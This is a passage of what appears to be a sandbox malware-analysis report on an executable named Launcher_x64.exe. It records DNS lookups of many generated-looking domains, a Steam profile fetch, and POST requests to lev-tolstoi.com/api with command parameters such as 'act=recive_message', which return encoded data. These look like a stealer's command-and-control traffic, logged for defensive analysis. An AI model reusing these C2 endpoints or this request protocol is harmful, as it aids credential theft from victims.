                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.282677889 CET192.168.2.41.1.1.10xf65eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.832012892 CET192.168.2.41.1.1.10x2885Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:04.983486891 CET1.1.1.1192.168.2.40xcb77Name error (3)bellflamre.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:05.254189014 CET1.1.1.1192.168.2.40x27e7No error (0)sendypaster.xyz193.143.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:37.035268068 CET1.1.1.1192.168.2.40x3be8No error (0)steppriflej.xyz193.143.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:08.932070017 CET1.1.1.1192.168.2.40x46dcName error (3)greywe-snotty.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.160857916 CET1.1.1.1192.168.2.40x14e2Name error (3)supporse-comment.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.413908005 CET1.1.1.1192.168.2.40x27f1Name error (3)smash-boiling.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.804028034 CET1.1.1.1192.168.2.40xbbb7Name error (3)ripe-blade.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.026997089 CET1.1.1.1192.168.2.40xb5f7Name error (3)hosue-billowy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.279098988 CET1.1.1.1192.168.2.40x335bName error (3)pollution-raker.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.420705080 CET1.1.1.1192.168.2.40xf65eNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:13.051553011 CET1.1.1.1192.168.2.40x2885No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:13.051553011 CET1.1.1.1192.168.2.40x2885No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                                                                      • lev-tolstoi.com

                                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      0192.168.2.44976523.55.153.1064433336C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:11 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:12 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:12 GMT
                                                                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: sessionid=3ea8fdf0261ff897b4cc175e; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:12 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:12 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:12 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      1192.168.2.449772172.67.157.2544433336C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:14 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:14 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=bg7k022palm5stn4uchqn6pegj; expires=Thu, 17 Apr 2025 18:04:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5cM3xwq5FCdfb8%2FHcrePTJpCqOKJ%2FEGMe7QzVqQNO0t3icEd2N3TyAJ%2FwdXbkIDblQTpLZksui0ZFf9YuEQzJkcefWHejexefjBnn59YAF7iU7sBprnserX8kTUA%2Bq9c2L8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c594e0d18ee-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1510&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1933774&cwnd=144&unsent_bytes=0&cid=4c826c2826ebe78d&ts=645&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      2192.168.2.449777172.67.157.2544433336C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:16 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 54
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:16 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 26 6a 3d
                                                                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--swetamubcoyu&j=
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=iia9ljn4vdlq40nhagf926mjm7; expires=Thu, 17 Apr 2025 18:04:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTEpDFcEKp2FhjbFZdndkNXFzEq26do8wy3fvmVgUwuWpcaKs4U7NZnzAc%2B0meo%2F%2BA%2FBaU1615NDezVe6yxZQyF%2FTdY5Q64ZBULLuqZsndZ5gwgTskmc8FO3kq%2Fo%2F33sPLE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c653b39de95-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1440&min_rtt=1432&rtt_var=554&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=953&delivery_rate=1945369&cwnd=240&unsent_bytes=0&cid=7bba36951ca18bcc&ts=790&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC238INData Raw: 34 39 31 63 0d 0a 45 44 55 41 4c 57 64 38 2b 51 6e 45 34 77 44 30 55 74 56 38 78 4e 69 73 62 45 45 44 6b 69 70 42 35 51 37 77 4f 51 30 4c 6d 63 78 72 46 33 59 50 58 55 6a 56 4b 37 65 47 49 73 34 6d 70 77 6d 68 39 49 34 4e 4a 53 47 6f 54 43 43 4a 66 5a 55 56 4c 33 33 30 37 69 70 54 59 55 45 55 47 64 55 72 6f 5a 73 69 7a 67 6d 75 58 71 47 32 6a 6c 5a 6a 5a 76 68 49 49 49 6c 73 6b 56 4a 69 65 2f 57 76 65 46 6c 6e 52 51 49 66 6e 57 69 6f 6a 6d 57 52 4e 37 51 57 71 72 48 42 42 43 77 68 76 67 67 6b 6e 79 7a 4b 47 30 42 75 37 61 31 64 56 48 4e 47 52 51 48 56 63 75 61 47 62 74 5a 6f 39 78 32 68 75 73 41 4b 4a 57 6a 36 51 69 6d 42 62 5a 52 54 66 57 4c 2f 70 48 68 58 5a 45 51 49 46 6f 6c 6c 6f 6f 6c 75 6c 7a 32 30
                                                                                                                                                                                                                                                                                      Data Ascii: 491cEDUALWd8+QnE4wD0UtV8xNisbEEDkipB5Q7wOQ0LmcxrF3YPXUjVK7eGIs4mpwmh9I4NJSGoTCCJfZUVL3307ipTYUEUGdUroZsizgmuXqG2jlZjZvhIIIlskVJie/WveFlnRQIfnWiojmWRN7QWqrHBBCwhvggknyzKG0Bu7a1dVHNGRQHVcuaGbtZo9x2husAKJWj6QimBbZRTfWL/pHhXZEQIFolloolulz20
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1369INData Raw: 58 75 6a 36 79 52 5a 6a 4f 62 41 62 45 59 52 39 67 30 35 69 65 66 33 75 62 52 6c 37 44 77 49 53 32 7a 50 6d 69 57 36 59 4e 62 51 52 6f 62 76 4f 48 43 78 68 38 30 41 72 67 32 61 64 56 47 42 6e 38 61 6c 36 58 6d 56 41 41 68 61 64 5a 4b 58 42 4c 4e 59 33 72 31 37 2b 2b 75 34 65 49 47 4c 6b 52 54 4c 48 63 39 78 43 4c 32 37 33 37 69 6f 58 5a 45 45 45 45 35 74 35 72 6f 70 70 6b 79 4b 38 46 36 75 33 7a 67 4d 70 62 76 4e 49 4a 49 31 6d 6e 56 46 72 5a 50 61 6f 63 6c 63 69 41 55 55 5a 67 79 76 2b 77 55 47 54 49 4c 41 53 73 50 6a 30 54 6a 77 76 36 51 67 6b 69 79 7a 4b 47 32 64 73 2b 4b 31 35 57 47 46 48 44 67 79 62 65 61 43 4d 5a 34 51 32 73 68 43 73 75 64 77 45 4c 57 66 7a 51 53 69 4f 61 5a 56 66 4c 79 65 37 71 57 6f 58 4f 67 38 6b 45 35 42 6e 72 4a 5a 69 31 69 2f
                                                                                                                                                                                                                                                                                      Data Ascii: Xuj6yRZjObAbEYR9g05ief3ubRl7DwIS2zPmiW6YNbQRobvOHCxh80Arg2adVGBn8al6XmVAAhadZKXBLNY3r17++u4eIGLkRTLHc9xCL2737ioXZEEEE5t5roppkyK8F6u3zgMpbvNIJI1mnVFrZPaoclciAUUZgyv+wUGTILASsPj0Tjwv6QgkiyzKG2ds+K15WGFHDgybeaCMZ4Q2shCsudwELWfzQSiOaZVfLye7qWoXOg8kE5BnrJZi1i/
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1369INData Raw: 74 77 43 4b 57 66 2f 52 53 2f 48 49 74 4a 63 64 79 6d 6a 37 6c 68 55 64 6b 77 50 58 4b 35 6f 71 49 39 6c 67 48 43 6f 55 4c 2f 36 79 51 4a 6a 4f 62 42 46 49 6f 39 71 67 46 52 69 61 76 57 67 66 56 4a 74 52 77 55 65 6c 6d 36 69 69 6d 6d 56 50 62 4d 4d 72 4c 72 47 43 79 4a 72 2b 67 68 74 78 32 75 4b 47 7a 63 70 79 72 6c 35 46 56 64 4d 43 78 43 63 66 65 61 65 4c 49 39 77 73 42 4c 6d 34 6f 34 44 4b 32 54 31 52 79 4b 4e 59 70 64 52 59 32 48 31 72 57 42 59 5a 6b 38 4a 46 70 46 6d 71 49 56 71 6e 7a 75 38 47 4b 61 37 78 45 35 74 49 66 64 51 59 39 38 73 70 6c 78 6a 5a 50 54 73 52 31 52 73 51 51 49 49 32 33 54 6f 6d 43 4b 52 50 50 64 47 35 72 62 48 44 69 68 72 39 45 67 6b 69 6d 6d 52 58 47 78 6b 2f 4b 52 38 55 47 5a 44 44 42 4f 64 61 36 47 46 5a 34 51 31 76 68 4b 71
                                                                                                                                                                                                                                                                                      Data Ascii: twCKWf/RS/HItJcdymj7lhUdkwPXK5oqI9lgHCoUL/6yQJjObBFIo9qgFRiavWgfVJtRwUelm6iimmVPbMMrLrGCyJr+ghtx2uKGzcpyrl5FVdMCxCcfeaeLI9wsBLm4o4DK2T1RyKNYpdRY2H1rWBYZk8JFpFmqIVqnzu8GKa7xE5tIfdQY98splxjZPTsR1RsQQII23TomCKRPPdG5rbHDihr9EgkimmRXGxk/KR8UGZDDBOda6GFZ4Q1vhKq
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1369INData Raw: 55 68 37 77 59 36 78 32 75 65 47 7a 63 70 38 71 64 67 57 57 78 47 43 42 69 54 62 4b 69 4d 61 5a 41 37 73 42 6d 67 74 38 59 44 4a 6d 4c 78 54 43 6d 56 62 35 6c 52 59 6d 4f 37 34 44 4a 51 65 67 39 64 58 72 78 6e 6a 35 46 35 68 43 62 33 41 65 69 6a 6a 67 6b 76 49 61 67 49 49 49 68 6c 6e 56 4e 6e 5a 76 53 71 66 46 46 6b 51 67 41 52 6b 58 6d 75 6a 32 2b 64 50 37 77 4d 70 72 66 4b 41 69 64 70 2b 30 4a 6a 79 53 79 56 51 79 38 78 75 35 74 2f 57 47 4a 4d 45 31 36 45 4a 62 2f 42 5a 5a 70 77 37 31 36 71 74 4d 34 42 4c 32 33 37 51 43 4b 4c 59 70 56 65 5a 6d 48 7a 76 48 4e 54 61 6b 34 4c 45 5a 70 76 6f 34 52 6d 6b 54 53 78 45 65 62 30 6a 67 6b 37 49 61 67 49 44 4b 42 5a 30 48 70 56 4b 65 54 67 61 78 64 6c 51 30 56 47 32 32 65 6c 6a 57 71 5a 4e 72 34 53 72 4c 50 46 41
                                                                                                                                                                                                                                                                                      Data Ascii: Uh7wY6x2ueGzcp8qdgWWxGCBiTbKiMaZA7sBmgt8YDJmLxTCmVb5lRYmO74DJQeg9dXrxnj5F5hCb3AeijjgkvIagIIIhlnVNnZvSqfFFkQgARkXmuj2+dP7wMprfKAidp+0JjySyVQy8xu5t/WGJME16EJb/BZZpw716qtM4BL237QCKLYpVeZmHzvHNTak4LEZpvo4RmkTSxEeb0jgk7IagIDKBZ0HpVKeTgaxdlQ0VG22eljWqZNr4SrLPFA
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1369INData Raw: 4c 4a 34 4a 6a 6b 31 70 70 65 2f 79 6e 59 46 6c 76 51 41 30 57 6b 6d 71 69 68 47 2b 51 50 4c 30 66 6f 62 54 41 42 6d 4d 76 73 45 38 37 78 7a 54 53 65 6e 39 79 36 62 68 2f 64 6d 39 41 52 51 48 56 63 75 61 47 62 74 5a 6f 39 78 65 30 76 73 4d 63 4b 6d 62 2b 52 79 43 56 62 5a 39 51 66 57 37 30 71 6e 56 62 5a 45 41 44 48 35 35 68 71 6f 5a 6e 6e 54 2b 37 58 75 6a 36 79 52 5a 6a 4f 62 42 6d 4b 4a 52 37 6b 56 56 6b 66 2b 44 75 62 52 6c 37 44 77 49 53 32 7a 50 6d 67 6d 6d 64 4e 4c 63 53 70 72 37 44 44 6a 46 75 39 30 38 71 6a 48 36 59 58 47 68 69 38 36 56 39 55 58 42 44 43 77 79 65 65 62 54 42 4c 4e 59 33 72 31 37 2b 2b 76 67 4a 4d 33 48 7a 43 68 4b 52 62 34 52 51 59 6d 57 37 73 54 78 4f 49 6b 67 4a 58 73 4d 72 6f 49 35 72 6c 54 2b 32 46 36 71 33 79 77 63 6d 59 50
                                                                                                                                                                                                                                                                                      Data Ascii: LJ4Jjk1ppe/ynYFlvQA0WkmqihG+QPL0fobTABmMvsE87xzTSen9y6bh/dm9ARQHVcuaGbtZo9xe0vsMcKmb+RyCVbZ9QfW70qnVbZEADH55hqoZnnT+7Xuj6yRZjObBmKJR7kVVkf+DubRl7DwIS2zPmgmmdNLcSpr7DDjFu908qjH6YXGhi86V9UXBDCwyeebTBLNY3r17++vgJM3HzChKRb4RQYmW7sTxOIkgJXsMroI5rlT+2F6q3ywcmYP
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1369INData Raw: 58 70 46 41 4c 33 61 31 74 7a 4a 51 62 67 39 64 58 70 68 73 70 59 42 6f 6e 7a 79 34 47 61 4b 6f 78 41 6b 78 59 50 46 44 4c 6f 74 73 6e 31 5a 6c 61 50 4b 6a 66 6c 70 6c 53 41 6f 62 32 79 58 6d 68 6e 72 57 61 50 63 2f 71 37 48 43 56 58 6b 68 37 77 59 36 78 32 75 65 47 7a 63 70 2b 36 52 33 58 57 39 4d 43 68 32 4a 61 71 43 54 59 70 73 36 70 52 53 74 76 38 4d 44 4c 6d 4c 32 54 69 69 4c 66 70 74 62 62 47 4b 37 34 44 4a 51 65 67 39 64 58 72 68 38 73 49 74 6c 6d 69 61 38 48 36 57 73 77 78 35 6a 4c 37 42 5a 4a 4a 59 73 79 6b 31 2f 66 76 79 78 50 45 34 69 53 41 6c 65 77 79 75 67 69 47 53 52 4e 72 6b 4d 6f 37 7a 42 41 53 70 6f 39 45 41 67 68 32 69 57 58 47 70 71 39 36 56 31 56 47 31 4c 44 42 43 53 5a 4f 62 50 49 70 45 6f 39 30 62 6d 6d 39 55 4e 4c 32 79 77 56 32 32
                                                                                                                                                                                                                                                                                      Data Ascii: XpFAL3a1tzJQbg9dXphspYBonzy4GaKoxAkxYPFDLotsn1ZlaPKjflplSAob2yXmhnrWaPc/q7HCVXkh7wY6x2ueGzcp+6R3XW9MCh2JaqCTYps6pRStv8MDLmL2TiiLfptbbGK74DJQeg9dXrh8sItlmia8H6Wswx5jL7BZJJYsyk1/fvyxPE4iSAlewyugiGSRNrkMo7zBASpo9EAgh2iWXGpq96V1VG1LDBCSZObPIpEo90bmm9UNL2ywV22
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1369INData Raw: 53 39 75 34 2b 34 71 46 30 4a 45 45 78 75 63 66 65 53 30 59 5a 67 2b 73 41 6a 6d 70 66 46 41 59 32 37 71 43 48 75 2b 64 64 4a 63 59 79 6d 6a 37 6d 64 51 59 6b 67 66 43 4a 78 6e 74 34 70 76 6d 68 4b 34 47 62 43 35 77 51 30 79 61 4c 78 44 4c 73 63 69 30 6c 78 33 4b 61 50 75 58 56 42 30 54 43 6f 64 69 6d 4c 6d 7a 79 4b 52 4a 76 64 47 35 6f 53 4f 48 43 42 78 38 30 63 79 75 53 7a 4b 51 6c 45 70 38 4c 68 31 52 32 46 5a 44 68 4f 58 65 70 6a 42 4f 73 4a 69 35 55 7a 30 36 4e 46 4f 50 46 36 2b 43 43 4c 48 4e 4b 74 43 4c 33 2b 37 39 69 41 5a 49 6c 31 46 52 74 73 73 70 5a 4e 77 6b 44 4f 68 48 65 47 45 38 43 6b 31 61 2f 64 59 4a 4a 42 6a 30 68 55 76 5a 72 76 32 53 78 64 72 53 42 34 50 6a 57 61 32 68 69 4b 70 66 76 63 47 35 75 4b 4f 4f 79 42 76 2f 6b 38 31 6c 69 47 31
                                                                                                                                                                                                                                                                                      Data Ascii: S9u4+4qF0JEExucfeS0YZg+sAjmpfFAY27qCHu+ddJcYymj7mdQYkgfCJxnt4pvmhK4GbC5wQ0yaLxDLsci0lx3KaPuXVB0TCodimLmzyKRJvdG5oSOHCBx80cyuSzKQlEp8Lh1R2FZDhOXepjBOsJi5Uz06NFOPF6+CCLHNKtCL3+79iAZIl1FRtsspZNwkDOhHeGE8Ck1a/dYJJBj0hUvZrv2SxdrSB4PjWa2hiKpfvcG5uKOOyBv/k81liG1
